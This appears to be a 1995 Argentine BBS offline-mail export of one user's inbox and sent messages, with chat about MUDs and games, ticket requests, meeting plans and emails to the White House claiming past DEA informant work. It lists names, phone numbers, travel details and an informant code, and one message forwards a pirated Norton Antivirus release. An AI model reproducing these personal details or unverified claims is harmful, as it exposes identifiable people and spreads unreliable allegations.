cuando estoy ocupado es porque estoy adentro del mud te explico algunas cosas del mud para que tengas una idea de como entrar.. 1- pones mud 2- pones create barragan yuyo 3- donde barragan es el name y yuyo la clave.. eso lo elegis vos como quieras 4- una vez que estas adentro 5- poniendo : y algun texto hablas como si fuera tele por ejemplo :hola! apareceria barragan hola! 6- para ver quienes estan dentro del mud poner @who yo si estyo me llamo rastaman si me queres llamar a mi dentro del juego tenes que poner page por ejemplo page rastaman hola! como va? bueno espero que con esto puedas hacer algo por lo menos para llamar a alguno cu ando esta adentro del mud.. sino la otra que queda es hacer una teleconferencia cualquiera y mandarle la inv itacion con /invitar duracell che venite a la tele pd: creo que las invitaciones las lees aun estando dentro del mud..! bueno che nos vemos.. espero que esto que escribi te sirva... #*** Siguiente mensaje ***# Mens.: 57 De : chorro A : yuyo Tema : CHA CHAN CHA CHAN! Fecha: 15/09/1995 00:31:44 Bueno mi nombre lo sabes... Julian Lastiri y Marcel de Vasconcelos Montes... Fecha apox....fines de Diciembre.....NYC Alrededor de 20 dias.... IDA/VUELTA... #*** Siguiente mensaje ***# Mens.: 58 De : un1.satlink.com!caparros!Martin A : yuyo Tema : Subject: bogota Fecha: 15/09/1995 06:58:43 Para: yuyo From un1.satlink.com!caparros!Martin Tue Sep 12 17:14:20 1995 remote from uunet Received: from un1.satlink.com by relay3.UU.NET with SMTP id QQzgxo25740; Tue, 12 Sep 1995 17:14:20 -0400 Received: from caparros.UUCP (Ucaparro@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id SAA16857 for yuyo@mponline.com.ar; Tue, 12 Sep 1995 18:20:00 -0400 Message-Id: <199509122220.SAA16857@un1.satlink.com> Received: from martin@caparros.satlink.net by WPEGWAF ver. á0.6 at Tue, 12 Sep 1995 18:03:49 ARG From: uunet!caparros.satlink.net!martin To: uunet!mponline.com.ar!yuyo Date: Tue, 12 Sep 1995 18:03:49 ARG Subject: bogota Return-receipt-to: uunet!caparros.satlink.net!Martin Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) via SatLink UUCP Yuyo, como te decia, necesitaria dos pasajes para bogota para el 22 o 23 de septiembre -o por ahi. La vuelta para el 6 o 7 de octubre. Si no hay en avianca para esas fechas y podes conseguir otra, dale nomas, aunque seria mejor que fuera sin escalas. Los nombres son Martin Caparros y Antonio Caparros -mi hijo, que tiene cuatro (4) anos, atencion. Espero tu respuesta. Un abrazo. Martin. --- Martin Caparros E-mail: martin@caparros.satlink.net Buenos Aires - Argentina #*** Siguiente mensaje ***# Mens.: 59 De : duracell A : yuyo Tema : hola! Fecha: 15/09/1995 14:35:14 che buenos dias... yo es la primera vez en el dia que entro.. mi cuenta la usan otras 2 personas a veces.. vos por las dudas cuando no estas s egurrpo pregunta si soy dario... nos vemos! #*** Siguiente mensaje ***# Mens.: 60 De : walfav A : yuyo Tema : ctc Fecha: 15/09/1995 15:31:21 Disculpa, pasa que tamos con el tema de varios proc y andamos de aca para all.a. arce anda tambien con su causa. ok. tomada nota la clave. nos vemos luego. #*** Siguiente mensaje ***# Mens.: 61 De : dela A : yuyo Tema : ... Fecha: 15/09/1995 22:27:22 Decime a que hora te puedo llamar esta noche y arreglamos a que hora nos encontr amos ma¤ana, ok? cualquier cosa decime sino a que hora te puedo llamar ma¤ana... Chau, suerte!. /fi oops.. ahi deberia decir /fin :) #*** Siguiente mensaje ***# Mens.: 62 De : dela A : yuyo Tema : Reunion... Fecha: 16/09/1995 01:53:00 Hola, que tal! te dejo la direccion del lugar para encontrarnos.. direccion: Rivadavia 1424 , es como un cafe, se llama ' Gente Linda ' y es de mi hermana pero como tiene cerrado sabados y domingos, voy a ir yo, abro y los espero ahi (ya de paso tenemos pa tomar' y comer gratis :) queda en Rivadavia entre Parana y Uruguay... Yo voy a estar ahi.. te espero. es a las 18:00 Hs de ya hoy sabado. Chau, suerte! Gun. #*** Siguiente mensaje ***# Mens.: 63 De : dela A : yuyo Tema : ... Fecha: 16/09/1995 18:06:11 Bueno, ya son las 6 y no leiste el msg, y enok me dijo que tiene la pata esginsa da y no se puede mover, asi que no podia ir, igual hoy no voy a hacer nada me quedo en mi casa, cualquier cosa si queres que nos encontremos mas tarde dejame un msg y decime a que hora te llamo para arreglar a que hora nos encontramos alla, sino nos vemos a la noche por aca! Chau, suerte!. Gun. #*** Siguiente mensaje ***# Mens.: 64 De : dela A : yuyo Tema : ... Fecha: 16/09/1995 18:26:47 hola, mira voy a ir al local igual, voy a estar ahi con dos amigos de aca.. cualquier cosa llamame ahi al : 381- 8611 ok? Chau, suerte!. Gun. #*** Siguiente mensaje ***# Mens.: 65 De : duracell A : yuyo Tema : okap.. che eso de seguir de largo es jodido... Fecha: 16/09/1995 23:33:14 bastante jodido... yo por lo menos tardo como 3 dias en normarlizarme despues.. y bue che despues hablamos cuando vuelvas a la vida.. jejej bye saludos! #*** Siguiente mensaje ***# Mens.: 66 De : elmalo A : yuyo Tema : voy a cortar Fecha: 17/09/1995 18:22:27 corto y el telefono esta al lado de mi maquina si queres charlar noproblem, esto y probando la seguridad de mi BBS y implementando unas boludeces chau!!! :) #*** Siguiente mensaje ***# Mens.: 67 De : dela A : yuyo Tema : ... Fecha: 17/09/1995 19:32:08 Hola, tengo que cortar.. dejame un msg y decime a que hora te llamo ... chau, suerte!": Gun. #*** Siguiente mensaje ***# Mens.: 69 De : uki A : yuyo Tema : HI!!!!! Fecha: 17/09/1995 21:54:32 HOLA COMO ANDAS, COMO NO TE PODIA "LLAMAR", PORUQ E ESTAS BAJANDO ARCHIVOS, ESPERO NO SEAN LOS DE MI MAQUINA (CHISTE, CHISTE), TE DEJO ESTE MENSAJE PARA SOLO VER COMO ESTAS. [UKI...] #*** Siguiente mensaje ***# Mens.: 70 De : dela A : yuyo Tema : Aca te dejo las listas de bbs de U.S.A y alrededores :) Fecha: 18/09/1995 00:46:30 Hola, aca te dejo la lista, que ojala te puedas comunicar! siempre quise llamar a una bbs de afuera. Chau, suerte!: Gun. ------- Archivos adosados ------- 313bbs28.lst .... 58551 bytes 96listc4.zip .... 87844 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 71 De : robert (fwd:robert) (fwd:cucurucho) (fwd:malaru) (fwd:codi) (fwd:duracell) A : yuyo Tema : Norton Antivirus 95 *SALES FINAL* Fecha: 18/09/1995 00:53:12 ---------- COMENTARIO ---------- Si ya lo pudiste hacer correr te va a servir sino para cuando lo instales. -------------------------------- ---------- COMENTARIO ---------- Toma. A ver si te sirve :) (solo para probarlo! -------------------------------- .----[Norton Antivirus 95 *SALES FINAL*]----. | The Best Virus Scanner For Windows 95!! | | The Store Shrinkwrap Release | | Version[Symantec (c) 1995] | | ._____.______ .__. /\.__ - OuTLaW | |-/ ___/ ___/ ¬\| | ___/ ¬| \------------| |/ /_.¬\ ._>_ \ |/__/\_ | _/GENERATiON-X| |\ | \ | ¬\ \ | / _ ¬\ 1995 | |-\___ /___ /_|\__|----\__| /------------| `-----\/evl-\/---[o8.21.95]--\/-----[o1/o3]-' ------- Archivos adosados ------- gnx-nav1.zip .... 1326353 bytes gnx-nav2.zip .... 954119 bytes gnx-nav3.zip .... 892265 bytes gnx-navf.zip .... 4242 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 72 De : duracell (fwd:duracell) A : yuyo Tema : PARTIDOS PLANETS!!! Fecha: 18/09/1995 01:17:31 BUENO ACA COMIENZA LA BATALLA... ACA LES MANDO LA LISTA DE LOS QUE JUGAMOS Y LAS REGLAS.. Y EL RST DE CADA UNO. VA DESPUES.. BUENO LAS JUGADAS SON DE LUNES A VIERNES YO A LAS 23 DE CADA DIA LLAMO PARA BAJAR LOS RST, SI NO ESTAN.. PIERDEN EL TUR NO.. SI PIERDEN MAS DE 5 TURNOS SEGUIDOS SIN JUSTIFICAR.. NO JUEGAN MAS.. BUENO LA JUGADA QUEDO ASI.. ANGUS = THE FASCISTS. DURACELL = THE ROBOTS. CUCURUCHO = THE BIRDMEN. JFEDERICO = THE REBELS. ERNALV = THE EVIL EMPIRE. YUYO = THE COLONIES. HOWARD = THE LIZARDS. TOAD = THE PRIVATEERS. GEORGE (CHE) = THE CRYSTAL PEOPLE. BAYARD = THE CYBORGS. CAMO = THE FEDS. EN EL PROXIMO MENSAJE LES MANDO EL RST.. AUNQUE POR AHI TARDE HASTA MANIANA.. A ESO DE LAS 14 EN MANDARLOS.. BUENO.. HASTA LUEOGO.. #*** Siguiente mensaje ***# Mens.: 73 De : magu A : yuyo Tema : inter!! Fecha: 18/09/1995 03:00:30 mira yo de internet se muy poco pero como te decia preguntale a julian (usuario Julianag) que el la tine bastante clara eso si cualquier cosa que averigues comentame.... Chau..... nos vemos..... suerte..... magu (mario) #*** Siguiente mensaje ***# Mens.: 74 De : duracell A : yuyo Tema : direcciones Fecha: 18/09/1995 05:00:38 bill@witehouse.gov presidence@witehouse.gov saludos #*** Siguiente mensaje ***# Mens.: 75 De : nora A : yuyo Tema : HOLA ! Fecha: 18/09/1995 08:58:23 Cuando la otra persona lo leyo te cambia de color y aparece al lado la L de lei dos. Besos. Nora. #*** Siguiente mensaje ***# Mens.: 76 De : walfav A : yuyo Tema : Fecha: 18/09/1995 10:39:11 Hola, llegue a la ma¤ana... por aca todo bien. sin novedades de ninguna indole. WALTER #*** Siguiente mensaje ***# Mens.: 77 De : yuyo A : yuyo Tema : prueva Fecha: 18/09/1995 16:49:11 hola que tal #*** Siguiente mensaje ***# Mens.: 78 De : rantes A : yuyo Tema : inter Fecha: 18/09/1995 17:18:00 mira,mp tiene acceso,tenes que hablar eso con mav o el sysop,yo no lo se... en los cd roms hay algo de info,como la maga internet digest... #*** Siguiente mensaje ***# Mens.: 79 De : yuyo A : yuyo Tema : URGNETE Fecha: 18/09/1995 21:59:53 LLAMAR BILL CLIPTON POR VIA TELEFONICA PRIVADA #*** Siguiente mensaje ***# Mens.: 80 De : duracell A : yuyo Tema : PARTIDO PLANETS! Fecha: 18/09/1995 23:14:15 LES RECUERDO QUE LO QUE TIENE QUE HACER ES COPIAR ESTE ARCHIVO QUE LES QUEDA P EGADO ACA AL DIRECTORIO DONDE TIENEN EL PLANETS, Y UNA VEZ AHI CORRER EL UNPAC K.EXE UNA VEZ ECHO ESTO PONEN PLANETS (EL JUEGO) HACEN SU JUGADA.. CUANDO TERMINAN D E HACER TODO.. SALEN AL DOS DE NUEVO EJECUTAN MAKETURN Y EL JUEGO LES GENERA U N ARCHIVO LLAMADO: PLAYERX.TRN (DONDE X ES EL NRO DE JUGADOR.. ) ESE ARCHIVO ME LO TIENEN QUE SUBIR A MI CORREO.. TODOS LOS DIAS ANTES DE LAS 2 3.. DE LO CONTRARIO PIERDEN EL TURNO. POR MI PARTE ME COMPROMETO A QUE TENGAN LOS .RST TODOS LOS DIAS A MAS TARDAR A LAS 16... SALUDOS!! BYE PD: CUALQUIER COSA HABLAMOS POR FONO... ------- Archivos adosados ------- player11.rst .... 22381 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 81 De : yuyo (fwd:sysop) A : yuyo Tema : internet Fecha: 19/09/1995 01:09:27 ---------- COMENTARIO ---------- Hola, creo que mejor que explicarlo yo aqui es sugerirte que pases por el foro mpol/internet y ejecutes el comando LISTAR YELLOW o LISTAR WHITE (por lo de Yellow Pages y White Pages of Internet). Es justo lo que vos precisas. Saludos -------------------------------- nececito saber direcciones de usa de internat, hay alguna guia o halgo parecido desde ya muchas gracias raul horacio barragan #*** Siguiente mensaje ***# Mens.: 82 De : master A : yuyo Tema : muy avansado !? Fecha: 19/09/1995 02:06:25 Hola che ! bueno, decime sobre que es la direccion que estas buscando mejor dicho, de que es la direccion, asi veo si te la puedo conseguir y de ultima te averiguo como la podes conseguir... sino, pasate por el foro internet, que ahi seguro que tambien te pueden ayudar.. ! Un abrazo man ! Master (La casa esta en orden). #*** Siguiente mensaje ***# Mens.: 83 De : dela A : yuyo Tema : Datos! Fecha: 20/09/1995 14:44:42 Hola como estas? Aca te dejo los datos de jimena que te fajtaban... Telefono: 059425990 Nombre: Jimena Apellido: Gadea Fecha del Pasaje: 23/09/95 (salir de alla en lo posible entre las 13:00 y las 17:00 si no puede ser, mas tarde.) Vive en Uruguay, Montevideo. Bueno, desde ya te doy mil gracias pr todo lo que estas haciendo por mi. Nos leemos! Chau! Gun. #*** Siguiente mensaje ***# Mens.: 84 De : walfav A : yuyo Tema : ctc Fecha: 20/09/1995 20:50:45 PR arce no estuvo en toda la tarde, salio a eso de las 1045 y regreso solo un ra to a las 1700. el OP coronel estuvo al mediodia, luego no se porque sali y reger se a las 1630. Saludos. WALTER #*** Siguiente mensaje ***# Mens.: 85 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: Host unknown (Name server: ubik.satelink.net: host not found) Fecha: 21/09/1995 06:58:31 Para: yuyo From MAILER-DAEMON Wed Sep 20 06:21:15 1995 remote from uunet Received: from localhost by relay3.UU.NET with internal id QQzhzl20629; Wed, 20 Sep 1995 06:21:15 -0400 Date: Wed, 20 Sep 1995 06:21:15 -0400 From: uunet!MAILER-DAEMON (Mail Delivery Subsystem) Subject: Returned mail: Host unknown (Name server: ubik.satelink.net: host not found) Message-Id: To: The original message was received at Wed, 20 Sep 1995 06:21:15 -0400 from uucp1.UU.NET [192.48.96.32] ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- 501 ... 550 Host unknown (Name server: ubik.satelink.net: host not found) ----- Original message follows ----- Return-Path: Received: from uucp1.UU.NET by relay3.UU.NET with SMTP id QQzhzl20627; Wed, 20 Sep 1995 06:21:15 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp1.UU.NET with UUCP/RMAIL ; Wed, 20 Sep 1995 06:21:15 -0400 To: fernado@ubik.satelink.net Subject: la palma gerado Date: Fri Sep 15 14:13:10 rio 1995 mira este chico viaja a entre rios hoy en la noche y quiere verte para que le co nfirmes con el tema del equipo stop el fone de el en baires es01 812 8738 el de concep. del uruguay es 0442 25094/27474 cualquier cosa por favor llamrlo gracias y chauu contesta a veses un msg ok #*** Siguiente mensaje ***# Mens.: 86 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: Host unknown Fecha: 21/09/1995 06:58:42 Para: yuyo From MAILER-DAEMON Wed Sep 20 06:22:17 1995 remote from uunet Received: from localhost by relay3.UU.NET with internal id QQzhzl20813; Wed, 20 Sep 1995 06:22:17 -0400 Date: Wed, 20 Sep 1995 06:22:17 -0400 From: uunet!MAILER-DAEMON (Mail Delivery Subsystem) Subject: Returned mail: Host unknown Message-Id: To: The original message was received at Wed, 20 Sep 1995 06:22:16 -0400 from uucp1.UU.NET [192.48.96.32] ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- 950920062237.0107 uux: error -- Bad system name: help 950920062237.0208 uux: ERROR -- node help, code 68 550 ... Host unknown ----- Original message follows ----- Return-Path: Received: from uucp1.UU.NET by relay3.UU.NET with SMTP id QQzhzl20811; Wed, 20 Sep 1995 06:22:16 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp1.UU.NET with UUCP/RMAIL ; Wed, 20 Sep 1995 06:22:16 -0400 To: internet@help Subject: saber un usuario urgente Date: Mon Sep 18 03:25:30 rio 1995 solicito si me pueden informar la direccion de internet de la dea en us miami pl s es urgente gracias #*** Siguiente mensaje ***# Mens.: 87 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: Host unknown (Name server: telehouse.gov: host not found) Fecha: 21/09/1995 06:58:47 Para: yuyo From MAILER-DAEMON Wed Sep 20 06:22:44 1995 remote from uunet Received: from localhost by relay3.UU.NET with internal id QQzhzl20901; Wed, 20 Sep 1995 06:22:44 -0400 Date: Wed, 20 Sep 1995 06:22:44 -0400 From: uunet!MAILER-DAEMON (Mail Delivery Subsystem) Subject: Returned mail: Host unknown (Name server: telehouse.gov: host not found) Message-Id: To: The original message was received at Wed, 20 Sep 1995 06:22:43 -0400 from uucp1.UU.NET [192.48.96.32] ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- 501 ... 550 Host unknown (Name server: telehouse.gov: host not found) ----- Original message follows ----- Return-Path: Received: from uucp1.UU.NET by relay3.UU.NET with SMTP id QQzhzl20899; Wed, 20 Sep 1995 06:22:43 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp1.UU.NET with UUCP/RMAIL ; Wed, 20 Sep 1995 06:22:43 -0400 To: bill@telehouse.gov Subject: urgente Date: Mon Sep 18 05:23:15 rio 1995 necesito contacto urgente con fbi tema secreto fone argentina 0054 1 964 0774 yuyo #*** Siguiente mensaje ***# Mens.: 88 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: Host unknown (Name server: tehause.gov: host not found) Fecha: 21/09/1995 06:58:48 Para: yuyo From MAILER-DAEMON Wed Sep 20 06:22:44 1995 remote from uunet Received: from localhost by relay3.UU.NET with internal id QQzhzl20909; Wed, 20 Sep 1995 06:22:44 -0400 Date: Wed, 20 Sep 1995 06:22:44 -0400 From: uunet!MAILER-DAEMON (Mail Delivery Subsystem) Subject: Returned mail: Host unknown (Name server: tehause.gov: host not found) Message-Id: To: The original message was received at Wed, 20 Sep 1995 06:22:44 -0400 from uucp1.UU.NET [192.48.96.32] ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- 501 ... 550 Host unknown (Name server: tehause.gov: host not found) ----- Original message follows ----- Return-Path: Received: from uucp1.UU.NET by relay3.UU.NET with SMTP id QQzhzl20905; Wed, 20 Sep 1995 06:22:44 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp1.UU.NET with UUCP/RMAIL ; Wed, 20 Sep 1995 06:22:44 -0400 To: dea@tehause.gov Subject: sza 910014 Date: Mon Sep 18 05:25:27 rio 1995 pls ctc top urgent mr ricardo ramos sza 910014 very impota fo u.s tks #*** Siguiente mensaje ***# Mens.: 89 De : elmalo A : yuyo Tema : FELIZ PRIMAVERA!!! Fecha: 21/09/1995 09:11:13 Viva la joda loco! no tuve clases! ole ole oleo oleoeoloeleoleooel!!!! como va todo? eh? espero que este mail lo leas vos y no otro con tu clave!! jejeej, chau! sabes que no pude conseguir la COMPUMAGAZINE? compre la 86 porque no estaba la anterior Me la prestarias??? nos vemo!! chauuuuuu #*** Siguiente mensaje ***# Mens.: 90 De : uki A : yuyo Tema : ME SORPRENDE Fecha: 21/09/1995 13:11:29 SI ME SORPRENDE NO VERTE POR ESTOS LARES HACE TIEMPO, O SERA QUE ANDAS HACIENDO ALGUNA MALDAD, ESPERO QUE NO..... SI QUERES DEJAME EL HORARIO QUE TE VAS A CONECTAR Y HABLAMOS, O FIJATE SI ESTOY CONECTADO Y HABLAMOS................ UKI... #*** Siguiente mensaje ***# Mens.: 91 De : nw.com!nw A : yuyo Tema : Subject: Re: Remision Fecha: 22/09/1995 06:55:44 Para: yuyo From nw.com!nw Thu Sep 21 15:31:39 1995 remote from uunet Received: from nw.com by relay3.UU.NET with SMTP id QQzieo08291; Thu, 21 Sep 1995 15:31:39 -0400 Received: from localhost (nw@localhost) by nw.com (8.6.5/8.6.5) id MAA26929 for yuyo@mponline.com.ar; Thu, 21 Sep 1995 12:31:51 -0700 Date: Thu, 21 Sep 95 12:31:50 PDT From: Network Wizards To: uunet!mponline.com.ar!yuyo Subject: Re: Remision In-Reply-To: Your message of Mon Sep 18 11:50:09 rio 1995 Message-ID: Hi - Is there a particular product you are interested in that we can send email to you about? -Mark #*** Siguiente mensaje ***# Mens.: 92 De : vikiing A : yuyo Tema : Gracias x tu saludo, yuyito !! Fecha: 22/09/1995 07:02:22 Y te lo retribuyo, bro !! Un abrazo #*** Siguiente mensaje ***# Mens.: 94 De : nora A : yuyo Tema : :) Fecha: 22/09/1995 09:37:20 Bueno, muchas gracias, espero que vos tambien hayas tenido un lindo dia de Prima vera.! Besos. Nora. #*** Siguiente mensaje ***# Mens.: 95 De : gianni A : yuyo Tema : tiemp[o de conexion Fecha: 22/09/1995 13:14:37 Como andas? Mira, no se puede saber, porque solo tenemos informacion sobre la hora de conexion, y no la de corte... Saludos! PD: Muy buena la de los almuerzos! Avisa, nomas... #*** Siguiente mensaje ***# Mens.: 96 De : yuyo (fwd:gianni) A : yuyo Tema : buen fin de semana saludos yuyo Fecha: 22/09/1995 17:34:08 ---------- COMENTARIO ---------- idem! -------------------------------- #*** Siguiente mensaje ***# ------- Fin del envio fuera de linea ------- -------------------------------------------- Envio de mensajes fuera de linea MP OnLine! v2.2 - Offline reader 1.1 Mensajes de MP/correo/enviados -------------------------------------------- Mens.: 48 De : yuyo A : gianni Tema : PC Fecha: 23/08/1995 16:13:43 Habla con Alejandro para ver la posibilidad de conseguir una PC vieja y Modem pa ra instalarla en mi casa. Averigua si sale la nota en el mes proximo. Llamame a casa urgente. 962-6761. YUYO #*** Siguiente mensaje ***# Mens.: 49 De : yuyo A : walfav Tema : yuyo Fecha: 24/08/1995 22:56:58 Proxima semana viajo a Sanblo . comunicate con el jefe. dado que por telefono no puedo. necesito instrucciones sobrel ver a pepe. debido a que no logro comunicarme con ustedes. saludos yuyo. #*** Siguiente mensaje ***# Mens.: 50 De : yuyo A : fernando@ubik.satlink.net Tema : yuyo Fecha: 24/08/1995 22:59:38 comunicate en cuanto antes por el tema del domingo. el martes viajo a San Pablo. #*** Siguiente mensaje ***# Mens.: 51 De : yuyo A : gisvi@zorzal.edu.ar Tema : programa cable Fecha: 28/08/1995 23:17:14 Referente a tus declaracions me extranio tu posicion ya que el comisario Titrant e dice que no es delito. enfoca la cosa de otro modo y de ultima si sos valient e para decir que dos periodistas se jactan de el robo de pasajes y ademas de tu s injurias te pido un debate publico sobre el tema. coordiamente yuyo. pd: todo lo que escuche es mera copia de lo hablado por otros. con respecto al del codigo penal lee el cpp. lamento que no te respetaron ni el apellido. #*** Siguiente mensaje ***# Mens.: 52 De : yuyo A : walfav Tema : pepe gonzales Fecha: 28/08/1995 23:18:57 Favor de comunicarle a Cesar y Carlitos que necesito ubicarlos o ruinirnos porque no lospuedo ubicar. yuyo. #*** Siguiente mensaje ***# Mens.: 53 De : yuyo A : president@whithose.gov Tema : top urgent D.E.A. Top urgent Fecha: 28/08/1995 23:22:38 Solicito que tenga a bien contactarme con el agente especial Ricardo Ramos y/o supervisor dado que usembasis bs.as. me a dejado de lado luego de 4 anios de trabajo arriesgando la vida. Y quisiera explayarme de lo que esta ocurriendo aqui. FIRMA SZ910014 #*** Siguiente mensaje ***# Mens.: 54 De : yuyo A : walfav Tema : reunion Fecha: 29/08/1995 22:12:48 llamame por la maniana. yuyo #*** Siguiente mensaje ***# Mens.: 55 De : yuyo A : daniel@ubik.satlink.net Tema : brasil Fecha: 29/08/1995 22:14:15 Extrema importancia que manian nos encontremos . se confirmo operacion san pablo por 120.000.000 comunicate de cualquier forma. #*** Siguiente mensaje ***# Mens.: 56 De : yuyo A : president@whitehouse.gov Tema : Top urgent D.E.A. Top urgent Fecha: 30/08/1995 10:57:04 Solicito que tenga bien contactarme con el agente especial Ricardo Ramos y/o supervisor dedo que usembasis bs.as. me a dejado de lado luego de 4 anios de trabajo arriesgando la vida Y quisiera explayarme de lo que ha ocurrido FIRMA SZ910014 #*** Siguiente mensaje ***# Mens.: 57 De : yuyo A : daniel@ubik.satlink.net Tema : yuyo Fecha: 01/09/1995 01:21:30 necesito hablarte : tema un negocio que me salio y quiero que veas un material que tengo . yuyo #*** Siguiente mensaje ***# Mens.: 58 De : yuyo A : president@whitehouse.gov Tema : DEA Fecha: 02/09/1995 05:38:07 STEPHEN K. HORN DIRECTOR, PRESIDENCIAL E-MAIL THE OFFIE OF CORRESPONDENCE CON MI MAYOR RESPETO Y CONSIDERACION . HE RECIBIDO HOY SU AUTORESPONDER. MI NOMBRE ES RAUL HORACIO BARRAGAN Y HE TRABAJADO PARA LA D.E.A.. DURANTE 4 A¥OS A CAUSA DE ESO. ME COSTO UN A¥O Y UN MES EN CARCEL. EEUU HA INVERTIDO MUCHO DIRE NERO E INFORMACION CON MIGO. Y COSAS DE MUCHA IMPORTANCIA. HE ARRIESGADO MI VID A Y DE MI FAMILIA EN FORMA CONSTANTE PERO POR DIFERENCIA PRIMERO CON EL Sr. JEFE DE LA D.E.A. EN BS. AS. QUE ME ABANDONO. QUE DESCUBRI QUE TODOS SUS AGENTES DE LOS CUALES ELLOS ±±›±pwLáãåá Y HA SIDO CONDENADO A 10 A¥OS DE PRISION POR GRABACIONES QUE ELLOS POSEEN Y CON EL UNICO APOLLO QUE REALMENTE USTEDES DEBERAN FELICITAR AL Dr. RICARDO RAMOS QUE CONFIO EN MI Y EN TODAS CIRCUNSTANCIAS TRELACE A VUESTRA CAUSA Y A PESAR DE LA ENVIDIA POLICIAL SE ME CORTARON LOS LAS OS. ESTE ES MI ULTIMO TRABAJO MESAJE QUE LE ENVIO PORQUE ME SIENTO DESPROTEGIDO EN UN PAIS SEMI-DEMOCRATICO Y QUE TANTAS VECES ME UTILIZARON. ESTAN DESPROVECHANDOME O A LO MEJOR NO QUIEREN DESCUBRIR LA VERDADERA REALIDAD. PIDO QUE TOMEN MUCHA CONSIDERACION DE ESTE MENSAJE . SOLICITO QUE USTEDES SI LE INTERESA O NO QUE LO COMUNIQUEN YA SEA POR LA D.E.A O PARA MAYOR INFORMACION DEVIS SCREEN JEFE F.B.I. MONTE VIDEO. CREO QUE EN 4 O 5 DIAS ESTARE METIDO CON TODO EN LA INVESTIGACION DEL ATENTADO D DE LA AMIA Y LA ENBAJADA ISRAEILI. MI CODIGO ES SZA910014 . POR FAVOR CONTESTEME EN FORMA URGENTE PROQUE REALMENTE ASI PODRE ACTUAR CON CONV ICCION MORAL HACIA LO QUE USTEDES ME ENSE¥ARON. RAUL HORAIO BARRAGAN. S419626761 #*** Siguiente mensaje ***# Mens.: 59 De : WhiteHouse.Gov!autoresponder (fwd:yuyo) A : silvia Tema : Subject: Re: DEA Fecha: 04/09/1995 11:48:20 Para: yuyo From WhiteHouse.Gov!autoresponder Sun Sep 3 06:11:10 1995 remote from uunet Received: from WhiteHouse.Gov by relay1.UU.NET with SMTP id QQzfoq23028; Sun, 3 Sep 1995 06:11:10 -0400 From: uunet!WhiteHouse.Gov!autoresponder Received: by WhiteHouse.Gov (5.65/fma/mjr-120691); id AA08905; Sun, 3 Sep 95 06:10:58 -0400 Date: Sun, 3 Sep 95 06:10:58 -0400 Message-Id: <9509031010.AA08905@WhiteHouse.Gov> Subject: Re: DEA To: uunet!mponline.com.ar!yuyo Thank you for writing to President Clinton via electronic mail. Since June 1993, whitehouse.gov has received over 475,000 messages from people all across the country and the world. Because so many of you write, the President cannot personally review each message. The mail is first read by White House Correspondence staff. Your concerns, ideas, and suggestions are carefully recorded and communicated to the President weekly with a representative sampling of the mail. All of us at the White House are excited about the progress made with this historic project, and we look forward to future developments. Your continued interest and participation are very important to us. Sincerely, Stephen K. Horn Director, Presidential Email The Office of Correspondence P.S. Please read on - you may find the following information useful. -- This is the only electronic message you will receive from whitehouse.gov. No other message purporting to be from the President or his staff at whitehouse.gov is verifiable. If you have received such a message, you have been spoofed. You will receive only one autoresponder message per day. -- The only personal addresses at whitehouse.gov are the following: President@whitehouse.gov and Vice.President@whitehouse.gov Please write to The First Lady and Mrs. Gore by regular mail. The address is: The White House, Washington, D.C. 20500. -- Many are asking about the text for the State of the Union Address and about the List of Clinton Administration Accomplishments. These are available by email. See the instructions for publications retrieval below. -- On October 20, 1994, President Clinton and Vice President Gore increased the accessibility of government information by opening a World Wide Web home page called "Welcome to the White House: An Interactive Citizens' Handbook". This new WWW service provides a single point of access to all electronic government information on the Internet. "Welcome to the White House" can be accessed at: http://www.whitehouse.gov -- On January 5, 1995, The House of Representatives also established a new World Wide Web site for electronic access to bills before Congress (and other legislative data). Access the House Web site at: http://www.house.gov -- White House documents and publications are available by email. To receive instructions, please send a message to the following address (**do not "reply" to the memo you are now reading**): publications@whitehouse.gov In the body of your message, type "Send Info" (without quotes); no other text should be included (including message headers or signature lines (.sig files)). The instructions will be sent to you automatically. **************************************************************** State of the Union Address as delivered by the President on January 24, 1995. To retrieve the text, use the following commands: To: publications@whitehouse.gov Message body: send file 317535 List of Accomplishments (three documents compose the whole): To: publications@whitehouse.gov Message body: send file 317571 send file 317573 send file 317575 **************************************************************** -- The White House Public Access Email FAQ (Frequently Asked Questions) document is available at the following address. The FAQ, among other things, lists alternate sources of government information, i.e., the Congressional email projects. Send an email message (no text necessary) to: faq@whitehouse.gov (This FAQ address is an autoresponder only; any comment sent to this address will not be acknowledged.) #*** Siguiente mensaje ***# Mens.: 60 De : yuyo A : daniel@ubik.satlink.net Tema : yuyo Fecha: 05/09/1995 22:59:00 me gustaria mantener la reunion que teniamos para hoy maniana miercoles. viajo confirmado a el viernes a rio. es de suma importancia que nos veamos. #*** Siguiente mensaje ***# Mens.: 61 De : yuyo A : fernando@ubik.satlink.net Tema : yuyo Fecha: 05/09/1995 23:00:25 me gustaria mantener la reunion que teniamos parahoy manian miercoles. viajo confirmado el viernes a rio . es de suma importancia que nos veamos #*** Siguiente mensaje ***# Mens.: 62 De : yuyo A : uunet!dc.uba.ar!gisvi Tema : yuyo Fecha: 06/09/1995 00:06:17 por favor repetir mensaje #*** Siguiente mensaje ***# Mens.: 63 De : yuyo A : info@nw.com Tema : FORMAS PAGO Fecha: 06/09/1995 10:18:17 My English is not very good, but y need know how to pay the CTEK, CTC900 and CTC 1150. Y resident in Argentina. Where y have the cash or the check? Thanks. #*** Siguiente mensaje ***# Mens.: 64 De : yuyo A : jel Tema : sistema conectado Fecha: 11/09/1995 20:26:15 A partir de este momento ya estoy conectado con el sistema en casa. Espero que m e llames esta noche para empezar a practicar. Saludos, yuyo #*** 